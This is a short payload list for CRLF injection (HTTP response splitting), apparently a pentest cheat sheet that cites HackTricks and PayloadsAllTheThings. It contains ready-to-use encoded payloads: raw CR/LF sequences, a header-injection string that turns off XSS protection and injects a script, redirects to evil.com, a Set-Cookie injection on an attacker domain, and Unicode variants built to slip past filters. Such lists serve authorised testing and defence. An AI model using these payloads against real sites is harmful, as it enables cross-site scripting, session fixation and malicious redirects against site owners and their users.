CRLF Injection

A Carriage Return Line Feed (CRLF) payloads for your pentest

Payloads

%0d
%0a
%0d%0a
%250d%250a
\r
\n
\r\n
%3f%0d%0aLocation:%0d%0aContent-Type:text/html%0d%0aX-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%3Ealert%28document.domain%29%3C/script%3E
%0d%0aLocation:%20https://evil.com
%0D%0ASet-Cookie:test2=test;domain=evil.com
%E5%98%8A%E5%98%8DSet-Cookie:%20test
%E5%98%8D
%E5%98%8A
%E5%98%8D%E5%98%8AContent-Type:text/html%0d%0a
%0d%0aLocation:%20http://example.com
/%0d%0aLocation:%20http://example.com

References

CRLF (%0D%0A) InjectionHackTricks

PayloadsAllTheThings/CRLF Injection at master · swisskyrepo/PayloadsAllTheThingsGitHub